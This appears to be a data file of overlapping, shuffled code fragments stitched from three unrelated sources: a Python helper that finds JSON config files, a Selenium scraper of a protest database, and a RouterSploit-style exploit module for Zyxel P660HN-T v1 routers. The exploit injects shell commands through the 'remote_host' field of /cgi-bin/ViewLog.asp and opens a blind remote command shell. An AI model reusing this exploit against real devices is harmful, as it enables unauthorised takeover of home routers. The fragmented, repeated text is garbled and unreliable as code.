"return [ path for path in possible_files if os.path.exists(path) ] def load_json(file_name,app_name,search_folders=None): '''",
"data or None if file not found ''' actual_files = find_paths(file_name, app_name, search_folders)",
"file_name found ''' search_folders = search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name)",
"if not specified return the first path to file_name found ''' search_folders =",
"'%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None):",
"to search for configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s'",
"XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of folders to search for configuration",
"folder in search_folders ] return [ path for path in possible_files if os.path.exists(path)",
"file_name search_folders defaults to default_search_folders if not specified return the first path to",
"it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the",
"(XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name, '/var/www/%s' % app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search",
"given folders for file_name search_folders defaults to default_search_folders if not specified return the",
"Search the given folders for file_name search_folders defaults to default_search_folders if not specified",
"app_name ] def find_paths(file_name,app_name,search_folders=None): ''' Search the given folders for file_name search_folders defaults",
"default_search_folders if not specified return the first path to file_name found ''' search_folders",
"os # make it easy to change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name):",
"= search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder, file_name) for folder in search_folders",
"testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of folders to search for",
"search_folders return the loaded json data or None if file not found '''",
"change this for testing XDG_DATA_HOME=os.getenv('XDG_DATA_HOME','/usr/share/') def default_search_folders(app_name): ''' Return the list of folders",
"for configuration files ''' return [ '%s/cdis/%s' % (XDG_DATA_HOME, app_name), '/usr/share/cdis/%s' % app_name,",
"to default_search_folders if not specified return the first path to file_name found '''",
"import json import os # make it easy to change this for testing",
"''' Return the list of folders to search for configuration files ''' return",
"file_name) for folder in search_folders ] return [ path for path in possible_files",
"to file_name found ''' search_folders = search_folders or default_search_folders(app_name) possible_files = [ os.path.join(folder,",
"actual_files = find_paths(file_name, app_name, search_folders) if not actual_files: return None with open(actual_files[0], 'r')"
] |
[
"\"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\":",
"Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits Remote",
"Command Execution vulnerability in Zyxel P660HN-T v1 devices. \" \"If the target is",
"is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be not vulnerable\") def",
"or IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target port\") def run(self): if self.check():",
"routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T",
"it allows to execute commands on operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\",",
"method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def check(self): response = self.http_request( method=\"GET\",",
"OptPort(80, \"Target port\") def run(self): if self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking",
"\"Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. \" \"If",
"command injection - response is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to",
"vulnerability in Zyxel P660HN-T v1 devices. \" \"If the target is vulnerable it",
"path=\"/cgi-bin/authorize.asp\", ) if response is None: return False if \"ZyXEL P-660HN-T1A\" in response.text:",
"\"If the target is vulnerable it allows to execute commands on operating system",
"\"Target port\") def run(self): if self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command",
"} self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def check(self): response =",
"loop...\") print_status(\"It is blind command injection - response is not available\") shell(self, architecture=\"mipsbe\")",
"self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None: return False if \"ZyXEL P-660HN-T1A\"",
"\"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\", ), } target =",
"} target = OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\") port = OptPort(80,",
"from maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T v1",
"port\") def run(self): if self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command loop...\")",
") return \"\" @mute def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if",
"response is None: return False if \"ZyXEL P-660HN-T1A\" in response.text: return True return",
"commands on operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME>",
"to be not vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd) data = {",
"the target is vulnerable it allows to execute commands on operating system level.\",",
"response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None: return False if",
"= self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None: return False if \"ZyXEL",
"self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def check(self): response = self.http_request(",
"# vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\",",
"cmd): payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\",",
"{ \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\"",
"maza.core.exploit import * from maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { \"name\":",
"<pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\",",
"payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def",
"Execution vulnerability in Zyxel P660HN-T v1 devices. \" \"If the target is vulnerable",
"data=data ) return \"\" @mute def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", )",
"not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be not vulnerable\") def execute(self,",
"return \"\" @mute def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response",
"print_status(\"It is blind command injection - response is not available\") shell(self, architecture=\"mipsbe\") else:",
"architecture=\"mipsbe\") else: print_error(\"Target seems to be not vulnerable\") def execute(self, cmd): payload =",
"\"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits Remote Command Execution vulnerability in Zyxel",
"P660HN-T v1\", ), } target = OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\")",
"\";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\":",
"\"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data )",
"\"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\": (",
"vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\":",
"\"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data",
"\"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\"",
"= OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target port\")",
") if response is None: return False if \"ZyXEL P-660HN-T1A\" in response.text: return",
"be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind command injection - response is",
"blind command injection - response is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems",
"\"Zyxel P660HN-T v1\", ), } target = OptIP(\"\", \"Target IPv4 or IPv6 address:",
"to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind command injection - response",
"\"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute",
"\"\" @mute def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is",
"( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\", ), } target",
"HTTPClient class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module",
"\" \"If the target is vulnerable it allows to execute commands on operating",
"execute commands on operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery",
"level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module",
"IPv4 or IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target port\") def run(self): if",
"import HTTPClient class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\":",
"address: 192.168.1.1\") port = OptPort(80, \"Target port\") def run(self): if self.check(): print_success(\"Target appears",
"def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None: return",
"= \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\",",
"<marcin[at]threat9.com>\", # routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": (",
"\"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits Remote Command Execution vulnerability in",
"maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T v1 RCE\",",
"= { \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits Remote Command Execution",
"method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None: return False if \"ZyXEL P-660HN-T1A\" in",
"be not vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\":",
"OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target port\") def",
"\"Target IPv4 or IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target port\") def run(self):",
"system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit",
"if response is None: return False if \"ZyXEL P-660HN-T1A\" in response.text: return True",
"command loop...\") print_status(\"It is blind command injection - response is not available\") shell(self,",
"import * from maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel",
"available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be not vulnerable\") def execute(self, cmd):",
"injection - response is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be",
"devices. \" \"If the target is vulnerable it allows to execute commands on",
"is blind command injection - response is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target",
"= { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\":",
"# routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel",
"{ \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits Remote Command Execution vulnerability",
"class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits",
"( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\":",
"\"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\", ), } target = OptIP(\"\",",
"), } target = OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\") port =",
"( \"Zyxel P660HN-T v1\", ), } target = OptIP(\"\", \"Target IPv4 or IPv6",
"if self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind",
"module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\",",
"P660HN-T v1 devices. \" \"If the target is vulnerable it allows to execute",
"data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload,",
"\"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request(",
"exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. \" \"If the",
"target = OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target",
"\"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\",",
"print_error(\"Target seems to be not vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd) data",
"), \"devices\": ( \"Zyxel P660HN-T v1\", ), } target = OptIP(\"\", \"Target IPv4",
"* from maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = { \"name\": \"Zyxel P660HN-T",
"target is vulnerable it allows to execute commands on operating system level.\", \"authors\":",
"operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", #",
"\"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def check(self):",
"to execute commands on operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability",
"= OptPort(80, \"Target port\") def run(self): if self.check(): print_success(\"Target appears to be vulnerable\")",
"\"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\", ), }",
"not vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\",",
"in Zyxel P660HN-T v1 devices. \" \"If the target is vulnerable it allows",
"vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind command injection - response is not",
"\"devices\": ( \"Zyxel P660HN-T v1\", ), } target = OptIP(\"\", \"Target IPv4 or",
"@mute def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None:",
"from maza.core.exploit import * from maza.core.http.http_client import HTTPClient class Exploit(HTTPClient): __info__ = {",
"vulnerable it allows to execute commands on operating system level.\", \"authors\": ( \"<NAME>",
"print_status(\"Invoking command loop...\") print_status(\"It is blind command injection - response is not available\")",
"P660HN-T v1 RCE\", \"description\": \"Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T",
"is vulnerable it allows to execute commands on operating system level.\", \"authors\": (",
"__info__ = { \"name\": \"Zyxel P660HN-T v1 RCE\", \"description\": \"Module exploits Remote Command",
"print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind command injection",
"\"description\": \"Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. \"",
"\"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\",",
"RCE\", \"description\": \"Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices.",
"appears to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind command injection -",
"Zyxel P660HN-T v1 devices. \" \"If the target is vulnerable it allows to",
"v1 RCE\", \"description\": \"Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1",
"response is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be not vulnerable\")",
"else: print_error(\"Target seems to be not vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd)",
"- response is not available\") shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be not",
"discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ),",
"payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\":",
"def run(self): if self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It",
"\"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def check(self): response",
"\"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\": \"1\", \"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" }",
"\"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\", ), } target = OptIP(\"\", \"Target",
"def execute(self, cmd): payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\",",
"path=\"/cgi-bin/ViewLog.asp\", data=data ) return \"\" @mute def check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\",",
"\"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ),",
"\"LogFlag\": \"0\", \"remote_host\": payload, \"remoteSubmit\": \"Save\" } self.http_request( method=\"POST\", path=\"/cgi-bin/ViewLog.asp\", data=data ) return",
"Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. \" \"If the target",
"run(self): if self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is",
"v1 devices. \" \"If the target is vulnerable it allows to execute commands",
"is None: return False if \"ZyXEL P-660HN-T1A\" in response.text: return True return False",
"shell(self, architecture=\"mipsbe\") else: print_error(\"Target seems to be not vulnerable\") def execute(self, cmd): payload",
"seems to be not vulnerable\") def execute(self, cmd): payload = \";{};#\".format(cmd) data =",
"port = OptPort(80, \"Target port\") def run(self): if self.check(): print_success(\"Target appears to be",
"check(self): response = self.http_request( method=\"GET\", path=\"/cgi-bin/authorize.asp\", ) if response is None: return False",
"allows to execute commands on operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", #",
"), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\", ), \"devices\": ( \"Zyxel P660HN-T v1\", ),",
"execute(self, cmd): payload = \";{};#\".format(cmd) data = { \"remote_submit_Flag\": \"1\", \"remote_syslog_Flag\": \"1\", \"RemoteSyslogSupported\":",
"v1\", ), } target = OptIP(\"\", \"Target IPv4 or IPv6 address: 192.168.1.1\") port",
"vulnerability discovery \"<NAME> <marcin[at]threat9.com>\", # routersploit module ), \"references\": ( \"http://seclists.org/fulldisclosure/2017/Jan/40\", \"https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt\", \"https://blogs.securiteam.com/index.php/archives/2910\",",
"on operating system level.\", \"authors\": ( \"<NAME> <pedrib[at]gmail.com>\", # vulnerability discovery \"<NAME> <marcin[at]threat9.com>\",",
"192.168.1.1\") port = OptPort(80, \"Target port\") def run(self): if self.check(): print_success(\"Target appears to",
"self.check(): print_success(\"Target appears to be vulnerable\") print_status(\"Invoking command loop...\") print_status(\"It is blind command",
"IPv6 address: 192.168.1.1\") port = OptPort(80, \"Target port\") def run(self): if self.check(): print_success(\"Target"
] |
[
"numeric pagenum = pagenum + 1 # append data from this click locations",
"Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date, Subject, Description, Participants\\n\"",
"1 pagenum = -1 while(pagenum < page_new): #click to next page if pagenum",
"import csv import codecs from bs4 import BeautifulSoup from selenium import webdriver from",
"#coverts from string to numeric pagenum = pagenum + 1 # append data",
"packages import time import itertools import csv import codecs from bs4 import BeautifulSoup",
"+ c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" +",
"# don't overflow website sleep(2) #update page numbers for while statement page_new =",
"# append data from this click locations = driver.find_elements_by_class_name(\"item-protest-location\") dates = driver.find_elements_by_class_name(\"protest-start\") participants",
"driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e) in zip(locations, dates, subjects, descriptions, participants):",
"page_new = int(page_new, 10) #coverts from string to numeric pagenum = pagenum +",
"page_new = 1 pagenum = -1 while(pagenum < page_new): #click to next page",
"while(pagenum < page_new): #click to next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() #",
"participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\" + b.text.replace(\",\", \"|\")",
"c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description: \",\"\") + \",\" + e.text",
"= driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d, e) in zip(locations,",
"webdriver from time import sleep # access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver",
"#update page numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10)",
"\"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import time import itertools import csv import",
"Participants\\n\" f.write(headers) # loop clicks over all pages page_new = 1 pagenum =",
"import codecs from bs4 import BeautifulSoup from selenium import webdriver from time import",
"into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" # import packages import time",
"= driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from string to numeric pagenum =",
"c, d, e) in zip(locations, dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text,",
"< page_new): #click to next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't",
"#Instructions from https://www.youtube.com/watch?v=XQgXKtPSzUI&t=174s #How to open python in command prompt: #1) Shift+Right Click",
"bs4 import BeautifulSoup from selenium import webdriver from time import sleep # access",
"#1) Shift+Right Click -> open command prompt #2) type \"conda activate\" #3) type",
"#2) type \"conda activate\" #3) type \"python\" #To run the python script, type",
"= 1 pagenum = -1 while(pagenum < page_new): #click to next page if",
"driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from string to numeric pagenum = pagenum",
"\"conda activate\" #3) type \"python\" #To run the python script, type the following",
"website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv",
"filename = \"../Data/BLM Protests/protests_scrape.csv\" f = codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date,",
"10) #coverts from string to numeric pagenum = pagenum + 1 # append",
"\"Location, Date, Subject, Description, Participants\\n\" f.write(headers) # loop clicks over all pages page_new",
"-1 while(pagenum < page_new): #click to next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click()",
"b.text.replace(\",\", \"|\") + \",\" + c.text.replace(\",\", \"|\").replace(\"Subject(s): \",\"\") + \",\" + d.text.replace(\",\", \"|\").replace(\"Description:",
"participants = driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c,",
"sleep # access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2)",
"run the python script, type the following line into the command prompt: #python",
"codecs from bs4 import BeautifulSoup from selenium import webdriver from time import sleep",
"# import packages import time import itertools import csv import codecs from bs4",
"overflow website sleep(2) #update page numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new",
"string to numeric pagenum = pagenum + 1 # append data from this",
"= driver.find_elements_by_class_name(\"item-protest-participants\") descriptions = driver.find_elements_by_class_name(\"item-protest-description\") subjects = driver.find_elements_by_class_name(\"item-protest-subject\") for (a, b, c, d,",
"through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\" driver = webdriver.Chrome(chrome_path) driver.get('https://elephrame.com/textbook/BLM') sleep(2) # save csv filename",
"\"python\" #To run the python script, type the following line into the command",
"dates, subjects, descriptions, participants): print(a.text, b.text, c.text, d.text, e.text) f.write(a.text.replace(\",\", \"|\") + \",\"",
"website sleep(2) #update page numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new =",
"= codecs.open(filename, encoding='utf-8', mode='w+') headers = \"Location, Date, Subject, Description, Participants\\n\" f.write(headers) #",
"page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\") page_new = int(page_new, 10) #coverts from string to numeric pagenum",
"Shift+Right Click -> open command prompt #2) type \"conda activate\" #3) type \"python\"",
"page_new): #click to next page if pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow",
"# loop clicks over all pages page_new = 1 pagenum = -1 while(pagenum",
"pagenum > -1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update page numbers for",
"don't overflow website sleep(2) #update page numbers for while statement page_new = driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[3]/input\"\"\").get_attribute(\"value\")",
"type the following line into the command prompt: #python \"C:\\Users\\travi\\Dropbox\\Police Killings\\Do Files\\webscrape.py\" #",
"Files\\webscrape.py\" # import packages import time import itertools import csv import codecs from",
"-1: driver.find_element_by_xpath(\"\"\"//*[@id=\"blm-results\"]/div[1]/ul/li[4]\"\"\").click() # don't overflow website sleep(2) #update page numbers for while statement",
"import webdriver from time import sleep # access website through automated chrome chrome_path=r\"C:\\Users\\travi\\Anaconda3\\Lib\\site-packages\\selenium\\chromedriver.exe\"",
